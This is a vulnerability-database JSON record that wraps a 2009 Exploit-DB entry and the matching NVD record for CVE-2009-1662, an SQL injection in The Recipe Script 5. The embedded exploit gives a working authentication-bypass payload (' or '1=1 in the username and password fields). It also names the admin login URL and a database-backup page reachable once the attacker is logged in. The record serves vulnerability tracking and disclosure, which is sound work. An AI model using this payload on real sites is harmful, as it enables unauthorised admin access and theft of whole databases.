{"id": "EDB-ID:8642", "type": "exploitdb", "bulletinFamily": "exploit", "title": "The Recipe Script 5 Auth Bypass SQL Injection / DB Backup Vulns", "description": "The Recipe Script 5 (Auth Bypass) SQL Injection / DB Backup Vulns. CVE-2009-1662. Webapps exploit for php platform", "published": "2009-05-08T00:00:00", "modified": "2009-05-08T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/8642/", "reporter": "TiGeR-Dz", "references": [], "cvelist": ["CVE-2009-1662"], "lastseen": "2016-02-01T07:49:45", "viewCount": 6, "enchantments": {"score": {"value": 6.1, "vector": "NONE", "modified": "2016-02-01T07:49:45", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-1662"]}], "modified": "2016-02-01T07:49:45", "rev": 2}, "vulnersScore": 6.1}, "sourceHref": "https://www.exploit-db.com/download/8642/", "sourceData": "-----------------------------------------------------\nThe Recipe Script version 5 (Auth Bypass) Remote Sql Injecion/ Database Backup Exploit\n-----------------------------------------------------\nFounder: TiGeR-Dz\nscript:The Recipe Script version 5\ndownlaod:http://recipescript.com/\n-----------------------------------------------------------\n-----------------------------------------------------------\n(Auth Bypass) Remote Sql Injecion\n--------------------------------\nusername: ' or '1=1\nPassword: ' or '1=1\n\ndemo:\n-----\nhttp://recipescript.com/demo/admin/index.php\n------------------------------------------------------\nDatabase Backup Exploit:\n-------------------------\nAfter login to administration panel to get Backup\n\nhttp://recipescript.com/demo/admin/db_backup.php\n\n--------------------------------------------------------\n\n# milw0rm.com [2009-05-08]\n", "osvdbidlist": ["54556"]}

{"cve": [{"lastseen": "2020-10-03T11:54:13", "description": "Multiple SQL injection vulnerabilities in admin/login.php in Wright Way Services Recipe Script 5 allow remote attackers to execute arbitrary SQL commands via the (1) username and (2) Password fields, as reachable from admin/index.php.", "edition": 3, "cvss3": {}, "published": "2009-05-18T12:00:00", "title": "CVE-2009-1662", "type": "cve", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-1662"], "modified": "2017-09-29T01:34:00", "cpe": ["cpe:/a:recipescript:recipe_script:5"], "id": "CVE-2009-1662", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1662", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:recipescript:recipe_script:5:*:*:*:*:*:*:*"]}]}